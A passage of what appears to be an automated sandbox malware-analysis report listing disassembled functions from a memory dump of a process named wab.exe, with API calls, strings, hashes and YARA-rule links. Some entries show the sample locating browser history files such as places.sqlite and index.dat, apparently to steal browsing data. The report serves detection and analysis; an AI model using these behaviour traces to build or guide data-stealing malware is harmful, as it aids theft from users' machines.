                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                          • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                          • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                          • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                                          • API String ID: 2221118986-1725073988
                                                                                                                                                                                                          • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                          • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004175B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ChangeCloseFindNotificationSleep
                                                                                                                                                                                                          • String ID: }A
                                                                                                                                                                                                          • API String ID: 1821831730-2138825249
                                                                                                                                                                                                          • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                          • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@DeleteObject
                                                                                                                                                                                                          • String ID: r!A
                                                                                                                                                                                                          • API String ID: 1103273653-628097481
                                                                                                                                                                                                          • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                          • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1033339047-0
                                                                                                                                                                                                          • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                          • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                          • memcmp.MSVCRT ref: 00444BA5
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$memcmp
                                                                                                                                                                                                          • String ID: $$8
                                                                                                                                                                                                          • API String ID: 2808797137-435121686
                                                                                                                                                                                                          • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                          • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                            • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                            • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                            • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                            • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                            • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                            • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                            • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                            • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                                                                            • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                            • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                            • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                                                                            • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                            • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                            • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1042154641-0
                                                                                                                                                                                                          • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                          • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                            • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                            • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                          • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2947809556-0
                                                                                                                                                                                                          • Opcode ID: 9c8f7abab99d1da351ac3b6f8ce72ab423c1774e4fe74519c125927a022e4df4
                                                                                                                                                                                                          • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c8f7abab99d1da351ac3b6f8ce72ab423c1774e4fe74519c125927a022e4df4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                                                                                                                                                                          • String ID: history.dat$places.sqlite
                                                                                                                                                                                                          • API String ID: 3093078384-467022611
                                                                                                                                                                                                          • Opcode ID: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                                                                                                                                                                          • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 839530781-0
                                                                                                                                                                                                          • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                          • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                                          • String ID: *.*$index.dat
                                                                                                                                                                                                          • API String ID: 1974802433-2863569691
                                                                                                                                                                                                          • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                          • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                                          • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004099F4 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@mallocmemcpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3831604043-0
                                                                                                                                                                                                          • Opcode ID: 2a092ad8f2336585ed98353820426f0e3c8ffb733fb9aa85e0df6135544c2253
                                                                                                                                                                                                          • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a092ad8f2336585ed98353820426f0e3c8ffb733fb9aa85e0df6135544c2253
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1156039329-0
                                                                                                                                                                                                          • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                          • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                          • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$ChangeCloseCreateFindNotificationTime
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1631957507-0
                                                                                                                                                                                                          • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                          • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1125800050-0
                                                                                                                                                                                                          • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                          • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                          • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                                                          • Opcode ID: 8b82e4f5ef2bc7d58288eb7d352e73fde76eaac7bad66d9443978647085fe40b
                                                                                                                                                                                                          • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b82e4f5ef2bc7d58288eb7d352e73fde76eaac7bad66d9443978647085fe40b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                          • String ID: BINARY
                                                                                                                                                                                                          • API String ID: 2221118986-907554435
                                                                                                                                                                                                          • Opcode ID: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                                                                                                                                                                                          • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
